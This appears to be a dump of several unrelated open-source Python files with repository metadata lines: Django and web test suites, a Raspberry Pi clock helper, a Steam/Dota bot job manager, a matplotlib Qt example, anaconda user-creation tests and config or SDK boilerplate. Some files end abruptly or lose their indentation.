Python
|
agpl-3.0
| 9,422 | 0.002972 |
"""
Tests for users API
"""
import datetime
from django.utils import timezone
from xmodule.modulestore.tests.factories import ItemFactory, CourseFactory
from xmodule.modulestore.django import modulestore
from student.models import CourseEnrollment
from .. import errors
from ..testutils import MobileAPITestCase, MobileAuthTestMixin, MobileAuthUserTestMixin, MobileEnrolledCourseAccessTestMixin
from .serializers import CourseEnrollmentSerializer
class TestUserDetailApi(MobileAPITestCase, MobileAuthUserTestMixin):
"""
Tests for /api/mobile/v0.5/users/<user_name>...
"""
REVERSE_INFO = {'name': 'user-detail', 'params': ['username']}
def test_success(self):
self.login()
response = self.api_response()
self.assertEqual(response.data['username'], self.user.username)
self.assertEqual(response.data['email'], self.user.email)
class TestUserInfoApi(MobileAPITestCase, MobileAuthTestMixin):
"""
Tests for /api/mobile/v0.5/my_user_info
"""
def reverse_url(self, reverse_args=None, **kwargs):
return '/api/mobile/v0.5/my_user_info'
def test_success(self):
"""Verify the endpoint redirects to the user detail endpoint"""
self.login()
response = self.api_response(expected_response_code=302)
self.assertTrue(self.username in response['location'])
class TestUserEnrollmentApi(MobileAPITestCase, MobileAuthUserTestMixin, MobileEnrolledCourseAccessTestMixin):
"""
Tests for /api/mobile/v0.5/users/<user_name>/course_enrollments/
"""
REVERSE_INFO = {'name': 'courseenrollment-detail', 'params': ['username']}
ALLOW_ACCESS_TO_UNRELEASED_COURSE = True
def verify_success(self, response):
super(TestUserEnrollmentApi, self).verify_success(response)
courses = response.data
self.assertEqual(len(courses), 1)
found_course = courses[0]['course']
self.assertTrue('video_outline' in found_course)
self.assertTrue('course_handouts' in found_course)
self.assertEqual(found_course['id'], unicode(self.course.id))
self.assertEqual(courses[0]['mode'], 'honor')
def verify_failure(self, response):
self.assertEqual(response.status_code, 200)
courses = response.data
self.assertEqual(len(courses), 0)
def test_sort_order(self):
self.login()
num_courses = 3
courses = []
for course_num in range(num_courses):
courses.append(CourseFactory.create(mobile_available=True))
self.enroll(courses[course_num].id)
# verify courses are returned in the order of enrollment, with most recently enrolled first.
response = self.api_response()
for course_num in range(num_courses):
self.assertEqual(
response.data[course_num]['course']['id'], # pylint: disable=no-member
unicode(courses[num_courses - course_num - 1].id)
)
class CourseStatusAPITestCase(MobileAPITestCase):
"""
Base test class for /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
REVERSE_INFO = {'name': 'user-course-status', 'params': ['username', 'course_id']}
def _setup_course_skeleton(self):
"""
Creates a basic course structure for our course
"""
section = ItemFactory.create(
parent_location=self.course.location,
)
sub_section = ItemFactory.create(
parent_location=section.location,
)
unit = ItemFactory.create(
parent_location=sub_section.location,
)
other_unit = ItemFactory.create(
parent_location=sub_section.location,
)
return section, sub_section, unit, other_unit
class TestCourseStatusGET(CourseStatusAPITestCase, MobileAuthUserTestMixin, MobileEnrolledCourseAccessTestMixin):
"""
Tests for GET of /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
def test_success(self):
self.login_and_enroll()
(section, sub_section, unit, __) = self._setup_course_skeleton()
response = self.api_response()
self.assertEqual(response.data["last_visited_module_id"], unicode(unit.location))
self.assertEqual(
response.data["last_visited_module_path"],
[unicode(module.location) for module in [unit, sub_section, section, self.course]]
)
class TestCourseStatusPATCH(CourseStatusAPITestCase, MobileAuthUserTestMixin, MobileEnrolledCourseAccessTestMixin):
"""
Tests for PATCH of /api/mobile/v0.5/users/<user_name>/course_status_info/{course_id}
"""
def url_method(self, url, **kwargs):
# override implementation to use PATCH method.
return self.client.patch(url, data=kwargs.get('data', None)) # pylint: disable=no-member
def test_success(self):
self.login_and_enroll()
(__, __, __, other_unit) = self._setup_course_skeleton()
response = self.api_response(data={"last_visited_module_id": unicode(other_unit.location)})
self.assertEqual(response.data["last_visited_module_id"], unicode(other_unit.location))
def test_invalid_module(self):
self.login_and_enroll()
response = self.api_response(data={"last_visited_module_id": "abc"}, expected_response_code=400)
self.assertEqual(response.data, errors.ERROR_INVALID_MODULE_ID)
def test_nonexistent_module(self):
self.login_and_enroll()
non_existent_key = self.course.id.make_usage_key('video', 'non-existent')
response = self.api_response(data={"last_visited_module_id": non_existent_key}, expected_response_code=400)
self.assertEqual(response.data, errors.ERROR_INVALID_MODULE_ID)
def test_no_timezone(self):
        self.login_and_enroll()
(__, __, __, other_unit) = self._setup_course_skeleton()
past_date = datetime.datetime.now()
response = self.api_response(
data={
"last_visited_module_id": unicode(other_unit.location),
"modification_date": past_date.isoformat() # pylint: disable=maybe-no-member
},
expected_response_code=400
)
self.assertEqual(response.data, errors.ERROR_INVALID_MODIFICATION_DATE)
def _date_sync(self, date, initial_unit, update_unit, expected_unit):
"""
Helper for test cases that use a modification to decide whether
to update the course status
"""
self.login_and_enroll()
# save something so we have an initial date
self.api_response(data={"last_visited_module_id": unicode(initial_unit.location)})
# now actually update it
response = self.api_response(
data={
"last_visited_module_id": unicode(update_unit.location),
"modification_date": date.isoformat()
}
)
self.assertEqual(response.data["last_visited_module_id"], unicode(expected_unit.location))
def test_old_date(self):
self.login_and_enroll()
(__, __, unit, other_unit) = self._setup_course_skeleton()
date = timezone.now() + datetime.timedelta(days=-100)
self._date_sync(date, unit, other_unit, unit)
def test_new_date(self):
self.login_and_enroll()
(__, __, unit, other_unit) = self._setup_course_skeleton()
date = timezone.now() + datetime.timedelta(days=100)
self._date_sync(date, unit, other_unit, other_unit)
def test_no_initial_date(self):
self.login_and_enroll()
(__, __, _, other_unit) = self._setup_course_skeleton()
response = self.api_response(
data={
"last_visited_module_id": unicode(other_unit.location),
"modification_date": timezone.now().isoformat()
}
)
self.assertEqual(response.data["last_visited_module_id"], unicode(other_unit.location))
def test_invalid_date(self):
self.login_and_enroll()
response = self.api_response(data={"modification_date": "abc"}, expected_response_code=400)
        self.assertEqual(response.data, errors.ERROR_INVALID_MODIFICATION_DATE)
|
Don-Li/CABexpt
|
CABexpt/clock.py
|
Python
|
gpl-3.0
| 1,906 | 0.026233 |
from time import strftime, monotonic, sleep
import pigpio
import CABmanager
class clock(object):
"""Clock"""
def __init__( self, pigpio_pi ):
        if type( pigpio_pi ) is CABmanager.CABmanager:
self.pigpio_pi = pigpio_pi.pi
else:
self.pigpio_pi = pigpio_pi
self.tickDiff = pigpio.tickDiff
        self.get_current_tick = self.pigpio_pi.get_current_tick
self.gpio_time_1 = self.get_current_tick()
self.gpio_time_2 = 0
self.time_now = 0
def update( self ):
self.gpio_time_2 = self.get_current_tick()
self.time_now += self.tickDiff( self.gpio_time_1, self.gpio_time_2 )/1000000.0
self.gpio_time_1 = self.gpio_time_2
return( self.time_now )
def assert_update( self, gpio_time_2 ):
self.gpio_time_2 = gpio_time_2
self.time_now += self.tickDiff( self.gpio_time_1, self.gpio_time_2 )/1000000.0
self.gpio_time_1 = self.gpio_time_2
return( self.time_now )
def get_time( self ):
return( self.time_now )
def reset( self ):
        self.gpio_time_1 = self.get_current_tick()
self.gpio_time_2 = 0
self.time_now = 0
def sleep( self, seconds ):
if seconds <= 0.5:
t1 = monotonic()
while monotonic() - t1 < seconds:
pass
else:
t1 = monotonic()
sleep( seconds - 0.4 )
while monotonic() - t1 < seconds:
pass
return( self.update() )
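# Hedged usage sketch (assumes a running pigpio daemon; not part of the module):
#     import pigpio
#     c = clock( pigpio.pi() )
#     c.sleep( 1.5 )          # busy-waits ~1.5 s, returns the updated time
#     print( c.get_time() )   # elapsed seconds since construction or reset()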
def get_date_dmy():
"""
Return the date in dd.mm.yyyy format as a string.
"""
return( strftime( "%d.%m.%Y" ) )
def get_date_hm():
"""
Return the time in hh.mm format as a string.
"""
return( strftime( "%H.%M" ) )
def get_date_hmdmy():
"""
Return the time in hh_mm_dd_mm_yyy format as a string
"""
return( strftime( "%H_%M_%d_%m_%Y" ) )
|
dana-i2cat/felix
|
optin_manager/src/python/openflow/optin_manager/users/models.py
|
Python
|
apache-2.0
| 1,961 | 0.022947 |
from django.db import models
from django.contrib import auth
from django.db.models.signals import post_save
class Priority(object):
Aggregate_Admin = 12000
Campus_Admin = 10000
Department_Admin = 8000
Building_Admin = 6000
Group_Admin = 4000
Strict_User = 2000
Nice_User = 1000
Priority_Margin = 2000
Strict_Priority_Offset = 1000
Priority_Scale = 1000
Admins = ["Aggragate Admin", "Campus Admin", "Department Admin",
"Building Admin", "Group Admin"]
class UserProfile(models.Model):
user = models.ForeignKey(auth.models.User, unique=True, related_name = 'profile')
    is_net_admin = models.BooleanField("Can Confirm Flow Space Requests", default=False)
is_clearinghouse_user = models.BooleanField("Clearinghouse account", default=False)
max_priority_level = models.IntegerField(null=True) # Otherwise will complain
supervisor = models.ForeignKey(auth.models.User, related_name = 'supervisor')
    admin_position = models.CharField(max_length = 1024, default="")
def __unicode__(self):
try:
return "Profile for %s" % self.user
except:
return "No user"
@classmethod
def get_or_create_profile(cls, user):
try:
profile = user.get_profile()
except UserProfile.DoesNotExist:
profile = cls.objects.create(
user=user,
is_net_admin = False,
max_priority_level = Priority.Strict_User,
supervisor = user,
is_clearinghouse_user = False,
)
return profile
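# Hedged usage sketch (hypothetical view code): fetch or lazily create the
# profile for the requesting user, then gate admin-only behaviour on it:
#     profile = UserProfile.get_or_create_profile(request.user)
#     if profile.is_net_admin:
#         ...  # show the flow-space approval UI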
from openflow.optin_manager.users.user_signal_handler import super_user_save
post_save.connect(super_user_save, sender=auth.models.User)
|
FroggedTV/grenouilleAPI
|
backend/bot_app.py
|
Python
|
gpl-3.0
| 3,850 | 0.003377 |
import logging
import pickle
import random
from gevent import Greenlet, sleep
from threading import Lock
from app import create_app
from dota_bot import DotaBot
from models import db, DynamicConfiguration, Game, GameStatus, GameVIP
from helpers.general import divide_vip_list_per_type
# Log
logging.basicConfig(format='[%(asctime)s] %(levelname)s %(message)s', level=logging.INFO)
class Credential:
"""A St
|
eam account credentials.
Attributes:
login: Steam user login.
password: Steam user password.
"""
def __init__(self, login, password):
"""Create a user credentials.
Args:
login: user login.
password: user password.
"""
self.login = login
self.password = password
class WorkerManager(Greenlet):
"""Master class starting Dota bots to process jobs.
The manager contains a initial pool of Steam Credentials.
It is a thread pooling jobs from the database, starting new Dota bots when a new job is available.
After a job process, the Dota bot informs that the credentials are available again.
Attributes:
app: The flask application the manager is linked to, containing configuration objects and database access.
working_bots: A dictionary of all currently working Dota bots, indexed by bot login.
"""
def __init__(self):
"""Initialize the worker manager thread."""
Greenlet.__init__(self)
# Initialize
self.app = create_app()
self.working_bots = {}
self.credentials = []
self.mutex = Lock()
# Parse credentials from config
bot_credentials_string = self.app.config['STEAM_BOTS']
bot_credentials = bot_credentials_string.split('@')
i = 0
while i < len(bot_credentials):
login = bot_credentials[i]
password = bot_credentials[i+1]
self.credentials.append(Credential(login, password))
i = i + 2
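        # e.g. a hypothetical STEAM_BOTS = 'bot1@pass1@bot2@pass2' yields two
        # Credential objects: (bot1, pass1) and (bot2, pass2)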
def _run(self):
"""Start the main loop of the thread, creating Dota bots to process available jobs."""
while True:
with self.app.app_context():
admins, casters = divide_vip_list_per_type(GameVIP.get_all_vips())
bot_pause = DynamicConfiguration.get('bot_pause', 'False')
for game in db.session().query(Game)\
.filter(Game.status==GameStatus.WAITING_FOR_BOT)\
.order_by(Game.id).all():
if len(self.credentials) == 0 or bot_pause == 'True':
continue
# Start a Dota bot to process the game
self.mutex.acquire()
credential = self.credentials.pop(random.randint(0, len(self.credentials) - 1))
g = DotaBot(self, credential, admins, casters, game.id, game.name, game.password,
game.team1, game.team2, game.team1_ids, game.team2_ids, game.team_choosing_first)
self.working_bots[credential.login] = g
game.status = GameStatus.CREATION_IN_PROGRESS
game.bot = credential.login
db.session().commit()
g.start()
self.mutex.release()
sleep(60)
def bot_end(self, credential):
"""Signal that a bot has finished it work and the credential is free to use again.
Args:
credential: `Credential` of the bot.
"""
self.mutex.acquire()
self.working_bots.pop(credential.login)
self.credentials.append(credential)
self.mutex.release()
# Start a Manager if this file is the main script.
if __name__ == '__main__':
g = WorkerManager()
g.start()
g.join()
|
openkamer/openkamer
|
website/tests.py
|
Python
|
mit
| 13,880 | 0.001225 |
import datetime
import logging
from django.contrib.auth.models import User
from django.test import Client
from django.test import TestCase
from django.urls import reverse
from person.models import Person
from parliament.models import ParliamentMember
from parliament.models import PoliticalParty
from document.models import Agenda
from document.models import CategoryDossier
from document.models import CategoryDocument
from document.models import Dossier
from document.models import Document
from document.models import Kamerstuk
from document.models import Voting
import openkamer.document
import openkamer.dossier
import openkamer.kamerstuk
logger = logging.getLogger(__name__)
class TestExample(TestCase):
def test_example(self):
logger.info('BEGIN')
logger.info('END')
class TestFindParliamentMembers(TestCase):
fixtures = ['person.json', 'parliament.json']
def test_find_member(self):
surname = 'Zijlstra'
forename = 'Halbe'
initials = 'H.'
member = ParliamentMember.find(surname=surname, initials=initials)
self.assertEqual(member.person.forename, forename)
def test_find_member_surname_prefix(self):
surname = 'Weyenberg van'
forename = 'Steven'
initials = 'S.P.R.A.'
member = ParliamentMember.find(surname=surname, initials=initials)
self.assertEqual(member.person.forename, forename)
surname = 'van Weyenberg'
        member = ParliamentMember.find(surname=surname, initials=initials)
self.assertEqual(member.person.forename, forename)
def test_find_member_non_ascii(self):
surname = 'Koser Kaya'
forename = 'Fatma'
initials = 'F.'
member = ParliamentMember.find(surname=surname, initials=initials)
        self.assertEqual(member.person.forename, forename)
surname = 'Koşer Kaya'
member = ParliamentMember.find(surname=surname, initials=initials)
self.assertEqual(member.person.forename, forename)
class TestPersonView(TestCase):
fixtures = ['person.json']
@classmethod
def setUpTestData(cls):
cls.client = Client()
def test_persons_overview(self):
response = self.client.get(reverse('persons'))
self.assertEqual(response.status_code, 200)
def test_person_overview(self):
persons = Person.objects.all()[:10]
for person in persons:
response = self.client.get(reverse('person', args=(person.slug,)))
self.assertEqual(response.status_code, 200)
def test_person_check_view(self):
response = self.client.get(reverse('persons-check'))
self.assertEqual(response.status_code, 200)
class TestWebsite(TestCase):
fixtures = ['person.json', 'parliament.json', 'government.json']
@classmethod
def setUpTestData(cls):
# TODO: improve performance of votings (tkapi)
openkamer.dossier.create_dossier_retry_on_error(33885)
openkamer.dossier.create_dossier_retry_on_error(33506)
cls.client = Client()
def test_homepage(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
def test_persons_overview(self):
response = self.client.get(reverse('persons'))
self.assertEqual(response.status_code, 200)
def test_person_overview(self):
persons = Person.objects.all()[:10]
for person in persons:
response = self.client.get(reverse('person', args=(person.slug,)))
self.assertEqual(response.status_code, 200)
def test_person_autocomplete_view(self):
response = self.client.get(reverse('person-autocomplete') + '?q=samsom')
self.assertEqual(response.status_code, 200)
def test_dossiers_overview(self):
response = self.client.get(reverse('wetsvoorstellen'))
self.assertEqual(response.status_code, 200)
def test_dossiers_filter_view(self):
ivo = Person.objects.filter(forename='Ivo', surname='Opstelten')[0]
response = self.client.get(reverse('wetsvoorstellen') + '?title=wet&submitter=' + str(ivo.id) + '&voting_result=AAN')
self.assertEqual(response.status_code, 200)
def test_dossier_views(self):
dossiers = Dossier.objects.all()
for dossier in dossiers:
response = self.client.get(reverse('dossier-tiles', args=(dossier.dossier_id,)))
self.assertEqual(response.status_code, 200)
def test_timeline_views(self):
dossiers = Dossier.objects.all()
for dossier in dossiers:
response = self.client.get(reverse('dossier-timeline', args=(dossier.dossier_id,)))
self.assertEqual(response.status_code, 200)
def test_timeline_horizontal_views(self):
dossiers = Dossier.objects.all()
for dossier in dossiers:
response = self.client.get(reverse('dossier-timeline-horizontal', args=(dossier.dossier_id,)))
self.assertEqual(response.status_code, 200)
response = self.client.get('/dossier/timeline/horizontal/json/?dossier_pk=' + str(dossier.id))
self.assertEqual(response.status_code, 200)
def test_document_view(self):
documents = Document.objects.all()
for document in documents:
response = self.client.get(reverse('document', args=(document.document_id,)))
self.assertEqual(response.status_code, 200)
def test_kamerstuk_view(self):
kamerstukken = Kamerstuk.objects.all()
for kamerstuk in kamerstukken:
response = self.client.get(reverse('kamerstuk', args=(kamerstuk.id_main, kamerstuk.id_sub,)))
self.assertEqual(response.status_code, 200)
def test_kamerstuk_modifications(self):
kamerstuk_08 = Kamerstuk.objects.get(id_main='33885', id_sub='8')
kamerstuk_11 = Kamerstuk.objects.get(id_main='33885', id_sub='11')
kamerstuk_29 = Kamerstuk.objects.get(id_main='33885', id_sub='29')
kamerstuk_original = Kamerstuk.objects.get(id_main='33885', id_sub='2')
self.assertEqual(kamerstuk_08.original, kamerstuk_original)
self.assertEqual(kamerstuk_11.original, kamerstuk_original)
self.assertEqual(kamerstuk_29.original, kamerstuk_original)
modifications = [kamerstuk_08, kamerstuk_11, kamerstuk_29]
for modification in kamerstuk_original.modifications:
self.assertTrue(modification in modifications)
def test_agendas_view(self):
response = self.client.get('/agendas/')
self.assertEqual(response.status_code, 200)
def test_agenda_view(self):
agendas = Agenda.objects.all()
for agenda in agendas:
response = self.client.get('/agenda/' + str(agenda.agenda_id) + '/')
self.assertEqual(response.status_code, 200)
def test_votings_overview(self):
response = self.client.get(reverse('votings'))
self.assertEqual(response.status_code, 200)
def test_voting_view(self):
votings = Voting.objects.all()
for voting in votings:
if voting.is_dossier_voting:
response = self.client.get(reverse('voting-dossier', args=(voting.dossier.dossier_id,)))
elif voting.kamerstuk:
response = self.client.get(reverse('voting-kamerstuk', args=(voting.kamerstuk.id_main, voting.kamerstuk.id_sub,)))
else:
print('WARNING: no kamerstuk found for voting id: {}'.format(voting.id))
continue
self.assertEqual(response.status_code, 200)
def test_parties_overview(self):
response = self.client.get(reverse('parties'))
self.assertEqual(response.status_code, 200)
def test_party_view(self):
parties = PoliticalParty.objects.all()
for party in parties:
if not party.slug:
print('WARNING: Empty party found, skipping view')
continue
response = self.client.get(reverse('party', args=(party.slug,)))
self.assertEqual(response.status_code, 200)
self.assertGreaterEqual(len(parties), 50)
def test_parliament_members_overview(self):
|
RyanChinSang/ECNG3020-ORSS4SCVI
|
BETA/TestCode/Matplotlib/mpl1.py
|
Python
|
gpl-3.0
| 3,865 | 0.001811 |
from __future__ import unicode_literals
import sys
import os
import random
import matplotlib
# Make sure that we are using QT5
matplotlib.use('Qt5Agg')
from PyQt5 import QtCore, QtWidgets
from numpy import arange, sin, pi
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
progname = os.path.basename(sys.argv[0])
progversion = "0.1"
class MyMplCanvas(FigureCanvas):
"""Ultimately, this is a QWidget (as well as a FigureCanvasAgg, etc.)."""
def __init__(self, parent=None, width=5, height=4, dpi=100):
fig = Figure(figsize=(width, height), dpi=dpi)
self.axes = fig.add_subplot(111)
self.compute_initial_figure()
FigureCanvas.__init__(self, fig)
self.setParent(parent)
FigureCanvas.setSizePolicy(self,
QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Expanding)
FigureCanvas.updateGeometry(self)
def compute_initial_figure(self):
pass
class MyStaticMplCanvas(MyMplCanvas):
"""Simple canvas with a sine plot."""
def compute_initial_figure(self):
t = arange(0.0, 3.0, 0.01)
s = sin(2 * pi * t)
self.axes.plot(t, s)
class MyDynamicMplCanvas(MyMplCanvas):
"""A canvas that updates itself every second with a new plot."""
def __init__(self, *args, **kwargs):
MyMplCanvas.__init__(self, *args, **kwargs)
timer = QtCore.QTimer(self)
timer.timeout.connect(self.update_figure)
timer.start(1000)
def compute_initial_figure(self):
self.axes.plot([0, 1, 2, 3], [1, 2, 0, 4], 'r')
def update_figure(self):
# Build a list of 4 random integers between 0 and 10 (both inclusive)
l = [random.randint(0, 10) for i in range(4)]
self.axes.cla()
self.axes.plot([0, 1, 2, 3], l, 'r')
self.draw()
class ApplicationWindow(QtWidgets.QMainWindow):
def __init__(self):
QtWidgets.QMainWindow.__init__(self)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.setWindowTitle("application main window")
self.file_menu = QtWidgets.QMenu('&File', self)
self.file_menu.addAction('&Quit', self.fileQuit,
QtCore.Qt.CTRL + QtCore.Qt.Key_Q)
self.menuBar().addMenu(self.file_menu)
self.help_menu = QtWidgets.QMenu('&Help', self)
self.menuBar().addSeparator()
self.menuBar().addMenu(self.help_menu)
self.help_menu.addAction('&About', self.about)
self.main_widget = QtWidgets.QWidget(self)
l = QtWidgets.QVBoxLayout(self.main_widget)
sc = MyStaticMplCanvas(self.main_widget, width=5, height=4, dpi=100)
dc = MyDynamicMplCanvas(self.main_widget, width=5, height=4, dpi=100)
l.addWidget(sc)
l.addWidget(dc)
self.main_widget.setFocus()
self.setCentralWidget(self.main_widget)
self.statusBar().showMessage("All hail matplotlib!", 2000)
def fileQuit(self):
self.close()
def closeEvent(self, ce):
self.fileQuit()
def about(self):
        QtWidgets.QMessageBox.about(self, "About",
"""embedding_in_qt5.py example
Copyright 2005 Florent Rougon, 2006 Darren Dale, 2015 Jens H Nielsen
This program is a simple example of a Qt5 application embedding matplotlib
canvases.
It may be used and modified with no restriction; raw copies as well as
modified versions may be distributed without limitation.
This is modified from the embedding in qt4 example to show the difference
between qt4 and qt5"""
)
qApp = QtWidgets.QApplication(sys.argv)
aw = ApplicationWindow()
aw.setWindowTitle("%s" % progname)
aw.show()
sys.exit(qApp.exec_())
# qApp.exec_()
|
dashea/anaconda
|
tests/pyanaconda_tests/user_create_test.py
|
Python
|
gpl-2.0
| 15,039 | 0.001596 |
# vim:set fileencoding=utf-8
#
# Copyright (C) 2015 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): David Shea <dshea@redhat.com>
#
from pyanaconda import users
import unittest
import tempfile
import shutil
import os
import crypt
import platform
import glob
@unittest.skipIf(os.geteuid() != 0, "user creation must be run as root")
class UserCreateTest(unittest.TestCase):
def setUp(self):
self.users = users.Users()
# Create a temporary directory with empty passwd and group files
self.tmpdir = tempfile.mkdtemp()
os.mkdir(self.tmpdir + "/etc")
open(self.tmpdir + "/etc/passwd", "w").close()
open(self.tmpdir + "/etc/group", "w").close()
open(self.tmpdir + "/etc/shadow", "w").close()
open(self.tmpdir + "/etc/gshadow", "w").close()
# Copy over enough of libnss for UID and GID lookups to work
with open(self.tmpdir + "/etc/nsswitch.conf", "w") as f:
f.write("passwd: files\n")
f.write("shadow: files\n")
f.write("group: files\n")
f.write("initgroups: files\n")
if platform.architecture()[0].startswith("64"):
libdir = "/lib64"
else:
libdir = "/lib"
os.mkdir(self.tmpdir + libdir)
for lib in glob.glob(libdir + "/libnss_files*"):
shutil.copy(lib, self.tmpdir + lib)
def tearDown(self):
shutil.rmtree(self.tmpdir)
def _readFields(self, filename, key):
"""Look for a line in a password or group file where the first field
matches key, and return the record as a list of fields.
"""
with open(self.tmpdir + filename) as f:
for line in f:
fields = line.strip().split(':')
if fields[0] == key:
return fields
return None
def create_group_test(self):
"""Create a group."""
self.users.createGroup("test_group", root=self.tmpdir)
fields = self._readFields("/etc/group", "test_group")
self.assertIsNotNone(fields)
self.assertEqual(fields[0], "test_group")
fields = self._readFields("/etc/gshadow", "test_group")
self.assertIsNotNone(fields)
self.assertEqual(fields[0], "test_group")
def create_group_gid_test(self):
"""Create a group with a specific GID."""
self.users.createGroup("test_group", gid=47, root=self.tmpdir)
fields = self._readFields("/etc/group", "test_group")
self.assertIsNotNone(fields)
self.assertEqual(fields[0], "test_group")
self.assertEqual(fields[2], "47")
def create_group_exists_test(self):
"""Create a group that already exists."""
with open(self.tmpdir + "/etc/group", "w") as f:
f.write("test_group:x:47:\n")
self.assertRaises(ValueError, self.users.createGroup, "test_group", root=self.tmpdir)
def create_group_gid_exists_test(self):
"""Create a group with a GID that already exists."""
with open(self.tmpdir + "/etc/group", "w") as f:
f.write("gid_used:x:47:\n")
self.assertRaises(ValueError, self.users.createGroup, "test_group", gid=47, root=self.tmpdir)
def create_user_test(self):
"""Create a user."""
self.users.createUser("test_user", root=self.tmpdir)
pwd_fields = self._readFields("/etc/passwd", "test_user")
self.assertIsNotNone(pwd_fields)
self.assertEqual(pwd_fields[0], "test_user")
# Check that the fields got the right default values
# UID + GID set to some sort of int
self.assertTrue(isinstance(int(pwd_fields[2]), int))
self.assertTrue(isinstance(int(pwd_fields[3]), int))
# home is /home/username
self.assertEqual(pwd_fields[5], "/home/test_user")
# shell set to something
self.assertTrue(pwd_fields[6])
shadow_fields = self._readFields("/etc/shadow", "test_user")
self.assertIsNotNone(shadow_fields)
self.assertEqual(shadow_fields[0], "test_user")
# Ensure the password is locked
self.assertTrue(shadow_fields[1].startswith("!"))
# Ensure the date of last password change is empty
self.assertEqual(shadow_fields[2], "")
# Check that the user group was created
grp_fields = self._readFields("/etc/group", "test_user")
self.assertIsNotNone(grp_fields)
self.assertEqual(grp_fields[0], "test_user")
# Check that user group's GID matches the user's GID
self.assertEqual(grp_fields[2], pwd_fields[3])
gshadow_fields = self._readFields("/etc/gshadow", "test_user")
self.assertIsNotNone(gshadow_fields)
self.assertEqual(gshadow_fields[0], "test_user")
def create_user_text_options_test(self):
"""Create a user with the text fields set."""
self.users.createUser("test_user", gecos="Test User", homedir="/home/users/testuser", shell="/bin/test", root=self.tmpdir)
pwd_fields = self._readFields("/etc/passwd", "test_user")
self.assertIsNotNone(pwd_fields)
self.assertEqual(pwd_fields[0], "test_user")
self.assertEqual(pwd_fields[4], "Test User")
self.assertEqual(pwd_fields[5], "/home/users/testuser")
self.assertEqual(pwd_fields[6], "/bin/test")
# Check that the home directory was created
self.assertTrue(os.path.isdir(self.tmpdir + "/home/users/testuser"))
def create_user_groups_test(self):
"""Create a user with a list of groups."""
# Create one of the groups
self.users.createGroup("test3", root=self.tmpdir)
# Create a user and add it three groups, two of which do not exist,
# and one which specifies a GID.
self.users.createUser("test_user", groups=["test1", "test2(5001)", "test3"], root=self.tmpdir)
grp_fields1 = self._readFields("/etc/group", "test1")
self.assertEqual(grp_fields1[3], "test_user")
grp_fields2 = self._readFields("/etc/group", "test2")
self.assertEqual(grp_fields2[3], "test_user")
self.assertEqual(grp_fields2[2], "5001")
grp_fields3 = self._readFields("/etc/group", "test3")
self.assertEqual(grp_fields3[3], "test_user")
def create_user_groups_gid_conflict_test(self):
"""Create a user with a bad list of groups."""
# Create one of the groups
self.users.createGroup("test3", gid=5000, root=self.tmpdir)
# Add test3 to the group list with a different GID.
self.assertRaises(ValueError, self.users.createUser,
"test_user", groups=["test3(5002)"], root=self.tmpdir)
def create_user_password_test(self):
"""Create a user with a password."""
self.users.createUser("test_user1", password="password", root=self.tmpdir)
shadow_fields = self._readFields("/etc/shadow", "test_user1")
self.assertIsNotNone(shadow_fields)
# Make sure the password works
self.assertEqual(crypt.crypt("password", shadow_fields[1]), shadow_fields[1])
# Set the encrypted password for another user with isCrypted
cryptpw = shadow_fields[1]
self.users.createUser("test_user2", password=cryptpw, isCrypted=True, root=sel
|
pferreir/indico-backup
|
indico/MaKaC/common/MaKaCConfig.py
|
Python
|
gpl-3.0
| 1,407 | 0.013504 |
# -*- coding: utf-8 -*-
##
##
## This file is part of Indico.
## Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN).
##
## Indico is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico;if not, see <http://www.gnu.org/licenses/>.
## WARNING: THE FOLLOWING LINE WILL BE OVERWRITTEN AT INSTALLATION TIME
indico_conf = "" # path to indico.conf
##
import os
if indico_conf == '': # we may be in development mode or in installation mode
    indico_conf = os.path.join(os.path.dirname(__file__), '..', '..', '..', 'etc', 'indico.conf')
if not os.path.exists(indico_conf):
# eggmode
indico_conf = os.path.join(os.path.dirname(__file__), '..', '..', 'etc', 'indico.conf.sample')
if not os.path.exists(indico_conf):
            indico_conf = os.path.join(os.path.dirname(__file__), '..', '..', '..', 'etc', 'indico.conf.sample')
execfile(indico_conf)
|
Azure/azure-sdk-for-python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_12_01/operations/_connection_monitors_operations.py
|
Python
|
mit
| 42,196 | 0.00519 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
